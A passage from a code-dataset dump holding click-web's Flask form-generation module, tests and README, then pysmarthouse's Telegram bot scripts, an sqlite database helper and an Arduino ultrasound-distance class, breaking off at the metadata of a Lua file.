"text": "from typing import List, Tuple\n\nimport click\nfrom flask import render_template, abort\n\nimport click_web\nfrom click_web.exceptions import CommandNotFound\nfrom click_web.resources.input_fields import get_input_field\n\n\ndef get_form_for(command_path: str):\n try:\n ctx_and_commands = _get_commands_by_path(command_path)\n except CommandNotFound as err:\n return abort(404, str(err))\n\n levels = _generate_form_data(ctx_and_commands)\n return render_template('command_form.html.j2',\n levels=levels,\n command=levels[-1]['command'],\n command_path=command_path)\n\n\ndef _get_commands_by_path(command_path: str) -> Tuple[click.Context, click.Command]:\n \"\"\"\n Take a (slash separated) string and generate (context, command) for each level.\n :param command_path: \"some_group/a_command\"\n :return: Return a list from root to leaf commands. each element is (Click.Context, Click.Command)\n \"\"\"\n command_path_items = command_path.split('/')\n command_name, *command_path_items = command_path_items\n command = click_web.click_root_cmd\n if command.name != command_name:\n raise CommandNotFound('Failed to find root command {}. There is a root commande named:{}'\n .format(command_name, command.name))\n result = []\n with click.Context(command, info_name=command, parent=None) as ctx:\n result.append((ctx, command))\n # dig down the path parts to find the leaf command\n parent_command = command\n for command_name in command_path_items:\n command = parent_command.get_command(ctx, command_name)\n if command:\n # create sub context for command\n ctx = click.Context(command, info_name=command, parent=ctx)\n parent_command = command\n else:\n raise CommandNotFound('Failed to find command for path \"{}\". Command \"{}\" not found. Must be one of {}'\n .format(command_path, command_name, parent_command.list_commands(ctx)))\n result.append((ctx, command))\n return result\n\n\ndef _generate_form_data(ctx_and_commands: List[Tuple[click.Context, click.Command]]):\n \"\"\"\n Construct a list of contexts and commands generate a python data structure for rendering jinja form\n :return: a list of dicts\n \"\"\"\n levels = []\n for command_index, (ctx, command) in enumerate(ctx_and_commands):\n # force help option off, no need in web.\n command.add_help_option = False\n\n input_fields = [get_input_field(ctx, param, command_index, param_index)\n for param_index, param in enumerate(command.get_params(ctx))]\n levels.append({'command': command, 'fields': input_fields})\n\n return levels\n"
},
{
"alpha_fraction": 0.5739532113075256,
"alphanum_fraction": 0.598694920539856,
"avg_line_length": 34.36538314819336,
"blob_id": "c6e0649821a3d7cbe7ef25d683d0221da07861d3",
"content_id": "3fc6ef553191bfdf35cd68c2ee6aba7c23ea9bf9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3681,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 104,
"path": "/tests/test_flask_app.py",
"repo_name": "JayBigGuy10/click-web",
"src_encoding": "UTF-8",
"text": "import pytest\nfrom bs4 import BeautifulSoup\n\n\ndef test_get_index(app, client):\n resp = client.get('/')\n assert resp.status_code == 200\n assert b'the root command' in resp.data\n\n\[email protected](\n 'command_path, response_code, expected_msg, expected_form_ids',\n [\n ('/cli/simple-no-params-command', 200, b'<title>Simple-No-Params-Command</title>',\n [\n '0.0.flag.bool_flag.checkbox.--debug'\n ]),\n ('/cli/unicode-test', 200, 'Åäö'.encode('utf-8'),\n [\n '0.0.flag.bool_flag.checkbox.--debug',\n '1.0.option.choice.option.--unicode-msg'\n ]\n ),\n ('/cli/command-with-option-and-argument', 200, b'<title>Command-With-Option-And-Argument</title>',\n [\n '0.0.flag.bool_flag.checkbox.--debug',\n '1.0.option.text.text.--an-option',\n '1.1.argument.int.number.an-argument'\n ]),\n ('/cli/sub-group/a-sub-group-command', 200, b'<title>A-Sub-Group-Command</title>',\n [\n '0.0.flag.bool_flag.checkbox.--debug'\n ]),\n ('/cli/command-with-input-folder', 200, b'<title>Command-With-Input-Folder</title>',\n [\n '0.0.flag.bool_flag.checkbox.--debug',\n '1.0.argument.path[r].file.folder'\n ]),\n ('/cli/command-with-output-folder', 200, b'<title>Command-With-Output-Folder</title>',\n [\n '0.0.flag.bool_flag.checkbox.--debug',\n '1.0.argument.path[w].hidden.folder']),\n ]\n)\ndef test_get_command(command_path, response_code, expected_msg, expected_form_ids, app, client):\n resp = client.get(command_path)\n form_ids = _get_form_ids(resp.data)\n print(form_ids)\n print(resp.data)\n assert resp.status_code == response_code\n assert expected_msg in resp.data\n assert expected_form_ids == form_ids\n\n\ndef _get_form_ids(html):\n soup = BeautifulSoup(html, 'html.parser')\n form_ids = [elem['name'] for elem in soup.find_all(['input', 'select'])]\n return form_ids\n\n\ndef test_exec_command(app, client):\n resp = client.post('/cli/simple-no-params-command')\n assert resp.status_code == 200\n assert b'Simpel noparams command called' in resp.data\n\n\ndef test_exec_sub_command(app, client):\n resp = client.post('/cli/sub-group/a-sub-group-command')\n assert resp.status_code == 200\n assert b'Sub group command called' in resp.data\n\n\ndef test_exec_default_arg_and_opt(app, client):\n resp = client.post('/cli/command-with-option-and-argument')\n assert resp.status_code == 200\n assert b'Ran command with option: option_value argument 10' in resp.data\n\n\[email protected](\n 'form_data, expected_msg',\n [\n ({'0.0.flag.bool_flag.--debug': None,\n '1.0.option.text.--an-option': None,\n '1.1.argument.int.an-argument': None\n },\n b'Ran command with option: option_value argument 10'),\n ({'0.0.flag.bool_flag.checkbox.--debug': None,\n '1.0.option.text.text.--an-option': None,\n '1.1.argument.int.number.an-argument': 321\n },\n b'Ran command with option: option_value argument 321'),\n ({'0.0.flag.bool_flag.checkbox.--debug': None,\n '1.0.option.text.text.--an-option': 'ABC',\n '1.1.argument.int.number.an-argument': 321\n },\n b'Ran command with option: ABC argument 321'),\n\n ])\ndef test_exec_with_arg_and_default_opt(form_data, expected_msg, app, client):\n resp = client.post('/cli/command-with-option-and-argument',\n data=form_data)\n assert resp.status_code == 200\n print(resp.data)\n assert expected_msg in resp.data\n"
},
{
"alpha_fraction": 0.6144813895225525,
"alphanum_fraction": 0.626223087310791,
"avg_line_length": 24.549999237060547,
"blob_id": "b38a9549300300084f3b0571e55673bc06d22f56",
"content_id": "18174a2bae5b86d2b25d9fd7977d2252054a419f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 511,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 20,
"path": "/click_web/web_click_types.py",
"repo_name": "JayBigGuy10/click-web",
"src_encoding": "UTF-8",
"text": "\"\"\"\nModule contains click types that could be useful on web pages and provide form validation by just setting type.\n\"\"\"\nimport re\n\nimport click\n\n\nclass EmailParamType(click.ParamType):\n name = 'email'\n EMAIL_REGEX = re.compile(r\"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)\")\n\n def convert(self, value, param, ctx):\n if self.EMAIL_REGEX.match(value):\n return value\n else:\n self.fail(f'{value} is not a valid email', param, ctx)\n\n\nEMAIL_TYPE = EmailParamType()\n"
},
{
"alpha_fraction": 0.6159809231758118,
"alphanum_fraction": 0.6189624071121216,
"avg_line_length": 20.240507125854492,
"blob_id": "e8c3352f844e25273efde948aa1f08d53ac2dc6a",
"content_id": "3f9da530cf918456cdba07c57ce7d8256db91516",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1677,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 79,
"path": "/README.rst",
"repo_name": "JayBigGuy10/click-web",
"src_encoding": "UTF-8",
"text": "click-web\n=========\n\nServe click scripts over the web with minimal effort.\n\n*Caution*: No security (login etc.), do not serve scripts publicly.\n\nUsage\n-----\n\nSee this demo `screen capture`_.\n\n.. _screen capture: https://github.com/fredrik-corneliusson/click-web/raw/master/doc/click-web-demo.gif\n\nTake an existing click script, like this one:\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n``example_command.py``\n\n::\n\n import click\n import time\n\n @click.group()\n def cli():\n 'A stupid script to test click-web'\n pass\n\n @cli.command()\n @click.option(\"--delay\", type=float, default=0.01, help='delay for every line print')\n @click.argument(\"lines\", default=10, type=int)\n def print_rows(lines, delay):\n 'Print lines with a delay'\n click.echo(f\"writing: {lines} with {delay}\")\n for i in range(lines):\n click.echo(f\"Hello row: {i}\")\n time.sleep(delay)\n\n if __name__ == '__main__':\n cli()\n\nCreate a minimal script to run with flask\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n``app.py``\n\n::\n\n from click_web import create_click_web_app\n import example_command\n\n app = create_click_web_app(example_command, example_command.cli)\n\nRunning example app:\n~~~~~~~~~~~~~~~~~~~~\n\nIn Bash:\n\n::\n\n export FLASK_ENV=development\n export FLASK_APP=app.py\n flask run\n\nUnsupported click features\n==========================\n\nIt has only been tested with basic click features, and most advanced\nfeatures will probably not work.\n\n- Variadic Arguments (will need some JS on client side)\n- Promts (probably never will)\n- Custom ParamTypes (depending on implementation)\n\nTODO\n====\n\n- Abort started/running processes."
}
] | 7 |
fspieler/cards | https://github.com/fspieler/cards | 16a01c49f514df5f114a01f16cf2d85d1b3beb23 | 926132c7f205a5353e205321ccf602daa0ef7b3e | 5ef2f77acf05749cd76381e21a438e3ddfaae7e3 | refs/heads/master | 2020-12-25T12:07:36.321291 | 2017-04-15T05:38:42 | 2017-04-15T05:38:42 | 88,323,207 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4863123893737793,
"alphanum_fraction": 0.48792269825935364,
"avg_line_length": 22,
"blob_id": "48cbf57d598dc111cd98f9c69de2cb344ac46deb",
"content_id": "a1c16b765910b8a6682bfe0e6446a08efc34c835",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 621,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 27,
"path": "/cards_impl/user.py",
"repo_name": "fspieler/cards",
"src_encoding": "UTF-8",
"text": "#/usr/bin/env python3\n\nclass User(object):\n def __init__(self,user_id=None):\n if user_id == None:\n self.new_user = True\n user_id = time.time()\n else:\n self.new_user = False\n #fetch all records from db about user_id\n self._populateUser() \n\n def commit(self):\n if self.new_user:\n pass\n else:\n #Do UPDATES \n pass\n\n def hole_cards():\n # fetch cards for user_id\n pass\n\n def delete(self):\n if self.new_user == False:\n return False\n # Delete user code here\n"
},
{
"alpha_fraction": 0.7446808218955994,
"alphanum_fraction": 0.7446808218955994,
"avg_line_length": 22.5,
"blob_id": "44edad19e24bffe28491fe4d69db714d4b68e984",
"content_id": "ea23e7ac1a2c19a143fbda893129654ea72439b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 94,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 4,
"path": "/cards_impl/__init__.py",
"repo_name": "fspieler/cards",
"src_encoding": "UTF-8",
"text": "from .pokerHands import *\nfrom .card import *\nfrom .orderedCards import *\nfrom .user import *\n"
}
] | 2 |
TomHaridi/Avimitin_Bot | https://github.com/TomHaridi/Avimitin_Bot | 6c60c737e74047e3150e1b3a4b49d37e4a208c43 | 8529de292b766ebe027534ac73587d4338966729 | 59135ac7311a035a6975998911a4875422ef2752 | refs/heads/master | 2023-03-15T12:52:02.171408 | 2020-06-19T03:14:33 | 2020-06-19T03:14:33 | 521,868,717 | 1 | 0 | null | 2022-08-06T06:41:11 | 2021-08-08T06:37:28 | 2020-06-19T03:14:46 | null | [
{
"alpha_fraction": 0.6021876931190491,
"alphanum_fraction": 0.6102475523948669,
"avg_line_length": 36.48920822143555,
"blob_id": "8d3a1eba444c8cc8387b197594d67dfb682db327",
"content_id": "00b679c3641cceea8053a159de67558b7f363e92",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5733,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 139,
"path": "/Bot1.py",
"repo_name": "TomHaridi/Avimitin_Bot",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# author: Avimitin\n# datetime: 2020/3/27 18:04\nimport telebot\nfrom telebot import types\nimport random\nimport yaml\nimport re\nimport json\nimport logging\nimport time\nfrom modules import regexp_search\n\nlogger = telebot.logger\ntelebot.logger.setLevel(logging.DEBUG)\n\n# 从config文件读取token\nwith open(\"config/config.yaml\", 'r+', encoding='UTF-8') as token_file:\n bot_token = yaml.load(token_file, Loader=yaml.FullLoader)\nTOKEN = bot_token['TOKEN']\n\n# 实例化机器人\nbot = telebot.TeleBot(TOKEN)\n\n\n# 命令返回语句\[email protected]_handler(commands=['start'])\ndef send_welcome(message):\n new_message = bot.send_message(message.chat.id, \"咱是个可爱的回话机器人\")\n time.sleep(120)\n bot.delete_message(chat_id=new_message.chat.id, message_id=new_message.message_id)\n\n\[email protected]_handler(commands=['help'])\ndef send_help(message):\n new_message = bot.send_message(message.chat.id, \"你需要什么帮助?随便提,反正我帮不上忙\")\n time.sleep(120)\n bot.delete_message(chat_id=new_message.chat.id, message_id=new_message.message_id)\n\n\n# 关键词添加程序\[email protected]_handler(commands=['add'])\ndef add_keyword(message):\n if message.from_user.username != 'example':\n new_message = bot.send_message(message.chat.id, '别乱碰我!')\n time.sleep(120)\n bot.delete_message(chat_id=new_message.chat.id, message_id=new_message.message_id)\n else:\n if len(message.text) == 4:\n bot.send_message(message.chat.id, '/add 命令用法: `/add keyword=value` 。请不要包含空格。', parse_mode='Markdown')\n elif re.search(r' ', message.text[5:]):\n bot.send_message(message.chat.id, '请不要包含空格!')\n else:\n text = message.text[5:]\n split_sen = re.split(r'=', text)\n split_sen_dic = {split_sen[0]: split_sen[1]}\n bot.send_message(message.chat.id, '我已经学会了,当你说{}的时候,我会回复{}'.format(split_sen[0], split_sen[1]))\n with open('config/Reply.yml', 'a+', encoding='UTF-8') as reply_file:\n reply_file.write('\\n')\n yaml.dump(split_sen_dic, reply_file, allow_unicode=True)\n\n\n# 关键词删除程序\[email protected]_handler(commands=['delete'])\ndef del_keyword(message):\n if message.from_user.username != 'SaiToAsuKa_kksk':\n new_message = bot.send_message(message.chat.id, '你不是我老公,爬')\n time.sleep(10)\n bot.delete_message(chat_id=new_message.chat.id, message_id=new_message.message_id)\n else:\n if len(message.text) == 7:\n bot.send_message(message.chat.id, \"/delete usage: `/delete keyword`.\", parse_mode='Markdown')\n else:\n text = message.text[8:]\n with open('config/Reply.yml', 'r+', encoding='UTF-8') as reply_file:\n reply_msg_dic = yaml.load(reply_file, Loader=yaml.FullLoader)\n if reply_msg_dic.get(text):\n del reply_msg_dic[text]\n bot.send_message(message.chat.id, '已经删除{}'.format(text))\n with open('config/Reply.yml', 'w+', encoding='UTF-8') as new_file:\n yaml.dump(reply_msg_dic, new_file, allow_unicode=True)\n else:\n msg = bot.send_message(message.chat.id, '没有找到该关键词')\n time.sleep(5)\n bot.delete_message(msg.chat.id, msg.message_id)\n\n\n# 信息json处理\[email protected]_handler(commands=['dump'])\ndef dump_msg(message):\n text = json.dumps(message.json, sort_keys=True, indent=4, ensure_ascii=False)\n new_msg = bot.send_message(message.chat.id, text)\n time.sleep(60)\n bot.delete_message(new_msg.chat.id, new_msg.message_id)\n\n\[email protected]_handler(commands=['post'])\ndef post_message(message):\n if message.chat.type == 'supergroup':\n if message.from_user.id == 'YOUR_TG_ID':\n if message.reply_to_message:\n msg = bot.send_message(message.chat.id, '正在发送投稿')\n bot.forward_message('YOUR_CHANNEL_ID', message.chat.id, message.reply_to_message.message_id)\n 
bot.edit_message_text('Submission succeeded', msg.chat.id, msg.message_id)\n                time.sleep(30)\n                bot.delete_message(msg.chat.id, msg.message_id)\n            else:\n                bot.send_message(message.chat.id, 'Please reply to a message to submit')\n        else:\n            bot.send_message(message.chat.id, 'Only admins can use this! Stop poking me')\n    else:\n        bot.send_message(message.chat.id, 'Please use this in a group')\n\n\n# +--------------------------------------------------------------------------------------------+\n# Check whether the keyword is in the dict and whether the value for that key is a list;\n# if it is, reply with a random sentence from the list, otherwise reply with the value directly.\n# The lambda in the handler decorator asks the imported regexp module whether the keyword\n# exists, returning True if it does and False otherwise.\n# +--------------------------------------------------------------------------------------------+\nre_mg = regexp_search.Msg()\n\n\[email protected]_handler(func=lambda message: re_mg.msg_match(message.text))\ndef reply_msg(message):\n    msg_dic = re_mg.reply_msg_dic\n    keyword = re_mg.keyword\n    # Read the reply value from the dict using the keyword key\n    reply_words = msg_dic[keyword]\n    if type(reply_words) == list:\n        num = random.randrange(len(reply_words))\n        bot.send_chat_action(message.chat.id, 'typing')\n        new_msg = bot.send_message(message.chat.id, reply_words[num])\n    else:\n        bot.send_chat_action(message.chat.id, 'typing')\n        new_msg = bot.send_message(message.chat.id, reply_words)\n\n\nif __name__ == '__main__':\n    # Start polling\n    bot.polling()\n"
},
{
"alpha_fraction": 0.6384589076042175,
"alphanum_fraction": 0.6494668126106262,
"avg_line_length": 32.03409194946289,
"blob_id": "3bd7a377590f440b16a42170a922fd6dd185d610",
"content_id": "7b430d2aef43ff218d68118cf33c8421749c8cdc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3385,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 88,
"path": "/Bot2.py",
"repo_name": "TomHaridi/Avimitin_Bot",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# author: Avimitin\n# datetime: 2020/3/29 13:58\nimport telebot\nimport yaml\nimport json\nimport re\nimport logging\n\nlogger = telebot.logger\ntelebot.logger.setLevel(logging.DEBUG)\n\nwith open('config/config.yaml', 'r+', encoding='UTF-8') as token_file:\n bot_token = yaml.load(token_file, Loader=yaml.FullLoader)\nTOKEN = bot_token['TOKEN2']\nbot = telebot.TeleBot(TOKEN)\n\n\[email protected]_handler(commands=['start'])\ndef send_message(message):\n bot.send_message(message.chat.id, '直接发送消息即可转发')\n\n\[email protected]_handler(commands=['help'])\ndef send_message(message):\n bot.send_message(message.chat.id, '没有帮助菜单,我就是没有感情的转发机器')\n\n# 解除+86 spam 的教程\[email protected]_handler(commands=['despam'])\ndef send_message(message):\n bot.send_message(message.chat.id, 'https://t.me/YinxiangBiji_News/480', disable_web_page_preview=False)\n\n\[email protected]_handler(commands=['report'])\ndef report_bug(message):\n new_msg = bot.send_message(message.chat.id, '正在提交您的bug')\n\n try:\n if len(message.text) == 7:\n raise ValueError('wrong length')\n\n text = message.text[7:]\n # 这里是我的TG账号\n bot.send_message('649191333', '有人向你提交了一个bug:{}'.format(text))\n bot.edit_message_text('发送成功,感谢反馈', chat_id=new_msg.chat.id, message_id=new_msg.message_id)\n\n except ValueError:\n bot.send_message(message.chat.id, '请带上您的问题再report谢谢')\n\n\ndef msg_filter(sentence):\n if sentence[0] == '/':\n return False\n else:\n return True\n\n\[email protected]_handler(func=lambda message: msg_filter(str(message.text)))\ndef forward_all(message):\n '''\n 当机器人收到的消息来自sample时,则会读取sample所回复对话的房间号,并将sample\n 发的回复转发到消息来源处。假如消息来源于其他人,bot会把消息转发给sample。\n '''\n if message.from_user.username == 'sample':\n if message.reply_to_message:\n try:\n reply_msg = message.reply_to_message.text\n reply_chat_id = re.search(r'^(\\d+)$', reply_msg, re.M)[0]\n bot.send_message(reply_chat_id, message.text)\n bot.send_message(message.chat.id, '发送成功')\n except telebot.apihelper.ApiException:\n bot.send_message(message.chat.id, '该房间不存在!')\n else:\n msg_from_chat_id = message.chat.id\n msg_from_user = message.from_user.username\n # 填入自己的chat id\n bot.send_message('YOUR_CHAT_ID', '用户:@{} 从\\n房间={}\\n向您发来了一条消息:\\n{}'.format(msg_from_user,msg_from_chat_id,message.text))\n else:\n new_msg = bot.send_message(message.chat.id, '正在发送您的消息。\\n(请注意,只有提醒发送成功才真的发送了,假如消息多次发送失败使用 /report 发送bug,或者请联系管理员)')\n\n msg_from_chat_id = message.chat.id\n msg_from_user = message.from_user.username\n bot.send_message('YOUR_CHAT_ID', '用户:@{} 从房间\\n{}\\n向您发来了一条消息:\\n{}'.format(msg_from_user,msg_from_chat_id,message.text))\n \n bot.edit_message_text(text='发送成功', chat_id = new_msg.chat.id, message_id=new_msg.message_id)\n\n\nbot.polling()\n"
},
{
"alpha_fraction": 0.7290470600128174,
"alphanum_fraction": 0.7359356880187988,
"avg_line_length": 20.219512939453125,
"blob_id": "f9b38230642eee3f161001209cd9447ed7baa6dc",
"content_id": "9d1f000df6879c3309288aea6ae813de1a690a1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1481,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 41,
"path": "/README.md",
"repo_name": "TomHaridi/Avimitin_Bot",
"src_encoding": "UTF-8",
"text": "# Telegram机器人\n\n一时兴起用来辅助自己TG聊天用的一些bot,目前暂时开源部分功能。Bot使用到的库: [PyTelegramBotAPI](https://github.com/eternnoir/pyTelegramBotAPI)\n\n## @Avimitin_bot\n\n- 机器人地址:https://t.me/Avimitin_bot\n\n- 机器人目前所拥有的功能:回话和回复命令。\n- 机器人使用的依赖:`PyYaml`,`PyTelegramBotAPI`\n- 机器人的特性:不使用api的`regexp`功能回话,通过yaml文件的独特文件格式,实现自定义关键词回复的功能,从而减少代码行数,降低维护难度。并且支持单关键词多语句回复,实现随机回话的效果。\n\n- 使用方法:\n\n> 安装好python3.8,和上述依赖。\n>\n> 本地新建目录,使用`git clone https://github.com/Avimitin/Avimitin_Bot.git`命令下载源码。\n>\n> 编辑 config 目录中的`Reply.yaml`和`config.yaml`文件\n>\n> 在`config.yaml`里修改`TOKEN: 你的token`,保存退出\n>\n> 在`Reply.yaml`文件里按照以下格式添加关键词和回复:\n>\n> ```yaml\n> keywords: replywords\n> keywords2:\n> - replywords1\n> - replywords2\n> ```\n> \n> 最后添加代理执行`python Bot1.py`即可\n\n- 启动bot之后,可通过 `/add` 和 `/delete` 命令增删关键词和回复\n\n## @avimibot\n\n- 机器人地址: https://t.me/avimibot\n- 机器人目前功能:转发消息并回复,可用于客服或联系被Spam用户。\n- 机器人依赖:`PyTelegramBotAPI`\n- 机器人特性:普通的转发机器人。\n\n"
}
] | 3 |
MichaelLing83/pysmarthouse | https://github.com/MichaelLing83/pysmarthouse | 6e512aea8bf2b42fea4e418e7ab3e94d9bf70a1b | dd28f2ccffafc39f4ef519021cddc0da31819ba0 | 73898051c801bcaf999877a1b64bc5b589de7f5a | refs/heads/master | 2020-04-17T18:35:14.551209 | 2018-08-22T09:40:21 | 2018-08-22T09:40:21 | 32,323,535 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5821404457092285,
"alphanum_fraction": 0.5975914597511292,
"avg_line_length": 40.91428756713867,
"blob_id": "232d41a6dcefef669e8df7c9e0b8a82789bb73e4",
"content_id": "c630daa334b85fc0160d11c3d239889aa53951b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4401,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 105,
"path": "/WebInterface/python/db.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/bin/env python3\n'''\nDatabase table structure:\n id text, t text, v real, ts timestamp\n\n Example:\n \"Kitchen\", \"Temperature\", 25.67, \"2014-12-10 17:25:53.956548\"\n'''\nimport sqlite3\nimport datetime\nimport os.path\nimport logging\n\nPATH_TO_DB = \"/home/pi/git/pysmarthouse/WebInterface/data/pysmarthouse.db\"\nALL_IDS = (\"05\", \"KitchenWindow\", \"FrontDoorStep\", \"SunRoom\", \"GuestTiolet\", \"MainToilet\", \"Bedroom_1\", \"Bedroom_2\", \"Bedroom_3\")\nALL_TYPES = (\"Temperature\", \"Relay\")\n\nclass PSMError(Exception):\n pass\n\ndef check(p, t, r):\n '''\n Check a variable if they satisfy given condition.\n p: parameter to check\n t: parameter has to be of this type\n r: parameter has to be in this range\n E.g.\n check(5, int, (5,6))\n check(5, int, range(4,9))\n '''\n if not isinstance(t, type): raise PSMError(\"{0} is not a type!\".format(t))\n if not isinstance(p, t): raise PSMError(\"{0} is not of type {1}!\".format(p, t))\n if isinstance(r, range) or isinstance(r, tuple) or isinstance(r, list):\n if not p in r: raise PSMError(\"{0} is not in {1}!\".format(p, r))\n elif r == None:\n # skip checking values\n pass\n else:\n if not p == r: raise PSMError(\"{0} != {1}\".format(p, r))\n\nclass DB:\n @staticmethod\n def gen_new_db():\n global PATH_TO_DB\n try:\n logging.info(\"Trying to create DB at {}\".format(PATH_TO_DB))\n conn = sqlite3.connect(PATH_TO_DB, detect_types=sqlite3.PARSE_DECLTYPES|sqlite3.PARSE_COLNAMES)\n logging.info(\"DB created at {}\".format(PATH_TO_DB))\n except sqlite3.OperationalError as e:\n # path not found, possibly it's not running on the right Raspberry Pi\n # use PWD instead\n logging.warning(\"Path could not be found: {}\".format(PATH_TO_DB))\n PATH_TO_DB = \"./pysmarthouse.db\"\n logging.warning(\"Trying to create DB at {} instead.\".format(PATH_TO_DB))\n conn = sqlite3.connect(PATH_TO_DB, detect_types=sqlite3.PARSE_DECLTYPES|sqlite3.PARSE_COLNAMES)\n logging.warning(\"DB created at {}\".format(PATH_TO_DB))\n c = conn.cursor()\n c.execute(\"drop table if exists pysmarthouse\")\n logging.info(\"Table pysmarthouse is dropped should it exist.\")\n c.execute(\"create table pysmarthouse (id text, t text, v real, ts timestamp)\")\n logging.info(\"Table pysmarthouse created with (id text, t text, v real, ts timestamp).\")\n def __init__(self):\n logging.info(\"Initializing DB instance...\")\n if not os.path.isfile(PATH_TO_DB): DB.gen_new_db()\n self.conn = sqlite3.connect(PATH_TO_DB, detect_types=sqlite3.PARSE_DECLTYPES|sqlite3.PARSE_COLNAMES)\n self.c = self.conn.cursor()\n logging.info(\"Initializing DB instance done.\")\n def insert(self, id, t, v, ts=None):\n # check parameter\n if ts == None:\n ts = datetime.datetime.now()\n check(id, str, ALL_IDS)\n check(t, str, ALL_TYPES)\n check(v, float, None)\n check(ts, datetime.datetime, None)\n # insert into database\n self.c.execute(\"insert into pysmarthouse(id,t,v,ts) values (?,?,?,?)\", (id, t, v, ts))\n self.conn.commit()\n logging.info(\"Record with id={}, t={}, v={}, ts={} is inserted.\".format(id, t, v, ts))\n def get_records(self, half_delta=datetime.timedelta(hours=12), ts=None):\n '''\n Return all records among |now()-ts| < half_delta\n Result is sorted by timestamp.\n '''\n if ts == None:\n ts = datetime.datetime.now()\n logging.debug(\"half_delta={}, ts={}\".format(half_delta, ts))\n check(half_delta, datetime.timedelta, None)\n check(ts, datetime.datetime, None)\n result = list()\n self.c.execute(\"select id, t, v, ts from pysmarthouse order by ts\")\n record = 
self.c.fetchone()\n while record:\n if abs(record[-1] - ts) < half_delta: result.append(record)\n record = self.c.fetchone()\n logging.debug(\"Found records: {}\".format(result))\n return tuple(result)\n\nif __name__ == '__main__':\n PATH_TO_DB = \"./pysmarthouse.db\"\n db = DB()\n for i in range(10):\n db.insert(ALL_IDS[i % len(ALL_IDS)], ALL_TYPES[i % len(ALL_TYPES)], float(i*2))\n for id, t, v, ts in db.get_records():\n print(\"{:16s}{:16s}{:8.2f}\\t{:10s}\".format(id, t, v, str(ts)))\n"
},
{
"alpha_fraction": 0.5792349576950073,
"alphanum_fraction": 0.5892531871795654,
"avg_line_length": 27.153846740722656,
"blob_id": "87b32b01cf1daf373498254b444f7ab941838085",
"content_id": "44ec67bfa28302a597d842abfd46677b07739097",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1098,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 39,
"path": "/lib/UltraSoundDistanceMeas/UltraSoundDistanceMeas.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n */\n\n#include \"UltraSoundDistanceMeas.h\"\n\n/****************************************************************************/\nunsigned long UltraSoundDistanceMeas::measure()\n{\n unsigned long round_trip_time = 0;\n unsigned long distance = 0;\n digitalWrite(trig_pin, LOW);\n digitalWrite(trig_pin, HIGH);\n delayMicroseconds(20);\n digitalWrite(trig_pin, LOW);\n round_trip_time = pulseIn(echo_pin, HIGH);\n if (round_trip_time !=0 )\n {\n distance = round_trip_time * (ULTRASOUND_SPEED >> 1 );\n }\n return distance;\n}\n\n/****************************************************************************/\nUltraSoundDistanceMeas::UltraSoundDistanceMeas(\n unsigned int _trig_pin, unsigned int _echo_pin):\n trig_pin(_trig_pin), echo_pin(_echo_pin)\n{\n}\n\nvoid UltraSoundDistanceMeas::init()\n{\n pinMode(trig_pin, OUTPUT);\n pinMode(echo_pin, INPUT);\n}\n"
},
{
"alpha_fraction": 0.43403884768486023,
"alphanum_fraction": 0.492026686668396,
"avg_line_length": 32.813724517822266,
"blob_id": "9e3f4679424ce88e3d241dadf2cbad263cedc2f7",
"content_id": "854d5b835b280b6c3cbfca658ad778eb401da0d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 3449,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 102,
"path": "/NodeMcu/init.lua",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
